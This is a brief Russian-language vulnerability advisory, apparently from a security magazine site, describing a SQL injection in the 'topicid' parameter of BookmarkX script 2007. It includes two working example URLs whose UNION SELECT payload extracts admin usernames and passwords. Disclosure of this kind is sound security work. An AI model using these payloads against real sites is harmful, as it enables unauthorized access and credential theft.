Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: BookmarkX script 2007
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «topicid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/* */1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/* */1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1